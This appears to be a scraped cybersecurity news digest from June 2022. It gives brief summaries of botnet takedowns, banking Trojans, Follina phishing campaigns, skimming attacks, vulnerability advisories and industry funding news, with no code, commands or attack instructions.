Authorities in the United States, Germany, the Netherlands and the U.K. last week said they dismantled the “RSOCKS” botnet, a collection of millions of hacked devices that were sold as “proxies” to cybercriminals looking for ways to route their malicious traffic through someone else’s show more ...
Cleafy observed a campaign. involving BRATA, aimed at obtaining a long-term presence on a targeted network to steal sensitive information from financial apps. The banking Trojan has been updated with new phishing techniques, new classes to request more permissions on the infected device, and drops a second-stage payload from the C2 server.
The 1st International Cybersecurity Challenge (ICC) concluded on Friday 17th June after two days of intensive and relentless competition between the teams to master this year’s cybersecurity challenges.
Claroty laid bare details of 15 security flaws in Siemens SINEC Network Management System. These can be abused—independently or in a combination—to pose numerous risks to Siemens systems. These flaws could allow the user to escalate their permissions, gain administrative rights to the system and leak sensitive information.
On Tuesday, June 14, 2022, Adobe released a security patch that fixed these vulnerabilities. They are identified as CVE-2022-30649, CVE-2022-30666, CVE-2022-30667, CVE-2022-30668, and CVE-2022-30669.
A new carding site, BidenCash, has been found leaking credit card details and the information of their owners for as little as $0.15 - all to gain attention of cybercriminals worldwide. The site admins also gave away a CSV database containing 6,600 credit cards for free, to promote their site. The majority of these cards are issued by VISA and belong to individuals based in the United States.
A WooCommerce credit card skimmer was found leveraging Telegram bot to steal the data and later sell it off in the underground forums - resulting in fake transactions on victims’ credit cards. eCommerce website owners are suggested to keep all their software up to date, use strong passwords, and firewall services, and protect the admin panel.
The switch in modus operandi, spotted by Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.
The partnership between CYBER.ORG and the TEALS program will increase nationwide K-12 cybersecurity literacy and ensure that more students can explore the possibility of careers within the field.
The CoinEgg scam uses fake domains and social media accounts to coax users into investing in fake exchanges. After making victims invest, scammers approached them as investigative agents who could help with the scam.
The recent ransomware attack on Illinois’ Lincoln College shows the growing cyber risks facing today’s schools. Unable to recover from the fatal blow that came out of the blue, the college recently closed its doors, ending 157 years of operations.
Ransomware attackers are betting on the fact that the losses from restoring systems are so high that a target is willing to pay to get a copy of the digital key, which can decrypt the files and restore everything to normal.
Air raid sirens sounded in the Israeli cities of Jerusalem and Eilat on Sunday evening and it appears that they were triggered by a cyberattack, possibly conducted by Iranian hackers.
The playbooks are intended to improve and standardize the approaches used by agencies to identify, remediate, and recover from vulnerabilities and incidents affecting their systems.
Tornado Cash is a protocol that allows users to send in some cryptocurrency using their own wallets and get it back via different addresses. Its code is designed to mix a user’s crypto with a pool of other users’ crypto in a smart contract.
Research published on Tuesday shows there's no truth to the claim that Mega, or an entity with control over Mega's infrastructure, is unable to access data stored on the service.
The challenge for a CISO is not only identifying all the potential open-source or third-party components that have been used in an enterprise system but also auditing the maintainers to ensure secure coding practices and vulnerability patching.
According to Sean Ragan, the FBI’s special agent in charge of San Francisco and Sacramento, cryptocurrency scams pose a significant threat on the social platform as they can target senior executives.
A cross-border operation, supported by Europol and involving the Belgian Police and the Dutch Police, resulted in the dismantling of an organized crime group involved in phishing, fraud, scams, and money laundering.
While the healthcare industry has always been a target of threat actors and particularly ransomware groups because of a lack of cybersecurity funding, 2022 has already shown a sharp increase in the rate of breaches.
A Distributed Denial of Service attack (DDoS attack) disrupted the proceedings at the 25th St Petersburg International Economic Forum, regarded as the Russian answer to the Davos World Economic Forum.
The round was led by the Late Stage Arm program of venture capital firm StageOne Ventures, alongside tech investor Neva SGR, and Israeli-based tech growth capital fund Viola Growth.
The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.
The rapid transaction-settlement speed of Zelle that helped drive its adoption also helps scammers create a false sense of urgency to trick consumers into authorizing immediate payments.
Aimed at financial institutions and insurance firms, OpCon is a cross-platform process automation and orchestration solution that can be used for the management of workloads across business-critical operations.
A new DFSCoerce Windows NTLM relay attack uses MS-DFSNM to entirely take over a Windows domain. The script used is based on the PetitPotam exploit. For this attack, researchers abused the Microsoft Active Directory Certificate Services, which is exposed to NTLM relay attacks. The best way to stop such attacks is to follow the guidelines suggested in the advisory released by Microsoft.
One of the bills signed into law on Tuesday, dubbed the Federal Rotational Cyber Workforce Program Act, establishes a program to allow cybersecurity professionals to rotate through multiple federal agencies and enhance their expertise.
The most severe of these bugs is CVE-2022-2156, which is described as a critical-severity use-after-free issue in Base. The security flaw was identified by Mark Brand of Google Project Zero.
The Series A financing provides capital for the Tel Aviv-based company to build "Application Detection and Response" technology capable of ferreting out malicious activities executed by insiders and imposters in enterprise applications.
QNAP has warned customers today that some of its NAS devices (with non-default configurations) are vulnerable to attacks that would exploit a three-year-old critical PHP vulnerability allowing remote code execution.
Retired Gen. Keith Alexander, the former NSA chief and head of U.S. Cyber Command, warned that Russia is likely to unleash cyberattacks against the U.S. financial sector as retaliation for the West’s involvement in its war with Ukraine.
Digital infrastructure services provider Cloudflare, which suffered an outage on Tuesday, said that the issue occurred because of a network change, not owing to a cyberattack.
CERT-UA issued two separate alerts unveiling the malicious activity by APT28 and UAC-0098 hacker groups as they weaponized Follina to deploy Cobalt Strike beacon and CredoMap malware, respectively. APT28 is sending emails laden with a malicious document that tries to exploit the fear among Ukrainians about a potential nuclear attack.
A Voicemail messaging campaign is targeting individuals in the key vertical markets of the U.S. to steal their Office365 and Outlook credentials, while evading anti-phishing tools through a CAPTCHA check. The email has an HTML attachment using a music note character to impersonate the file as a sound clip. However, the file's obfuscated JavaScript code leads the victim to a phishing site.
Adobe’s product is checking if components from 30 security products are loaded into its processes and likely blocks them, essentially denying them from monitoring for malicious activity.
Attackers are leveraging fake Facebook email uses copyrights to lure members of the Elections Infrastructure Information Sharing and Analysis Center (Ei-ISAC). The body of the email informed EI-ISAC that Facebook had taken down some of its content, as the result of a copyright infringement. The primary goal seems to be stealing Facebook login passwords and other information from EI-ISAC members.
WordPress Download Manager plugin versions 3.2.43 and below suffer from a cross site scripting vulnerability.
Zoo Management System version 1.0 suffers from a cross site scripting vulnerability.
Red Hat Security Advisory 2022-5162-01 - PostgreSQL is an advanced object-relational database management system.
Red Hat Security Advisory 2022-5157-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a privilege escalation vulnerability.
Red Hat Security Advisory 2022-5163-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include a null pointer vulnerability.
Red Hat Security Advisory 2022-5152-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.
Red Hat Security Advisory 2022-4999-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.715. Issues addressed include a memory exhaustion vulnerability.
Over the past year, Trail of Bits was engaged by the Defense Advanced Research Projects Agency (DARPA) to investigate the extent to which blockchains are truly decentralized. They focused primarily on the two most popular blockchains: Bitcoin and Ethereum. They also investigated proof-of-stake (PoS) blockchains and show more ...
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022. The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in
Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation, which involved law enforcement authorities from Belgium and the Netherlands, saw the arrests of nine individuals in the Dutch nation. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism
A newly discovered Magecart skimming campaign has its roots in a previous attack activity going all the way back to November 2021. To that end, it has come to light that two malware domains identified as hosting credit card skimmer code — "scanalytic[.]org" and "js.staticounter[.]net" — are show more ...
A new piece of research from academics at ETH Zurich has identified a number of critical security issues in the MEGA cloud storage service that could be leveraged to break the confidentiality and integrity of user data. In a paper titled "MEGA: Malleable Encryption Goes Awry," the researchers point out how MEGA's system does not protect its users against a malicious server, thereby enabling a
The Strava fitness-tracking app is being used to spy upon members of the Israeli military, tracking their movements at secret bases across the country and potentially even help observe their activities when they travel overseas. Read more in my article on the Hot for Security blog.
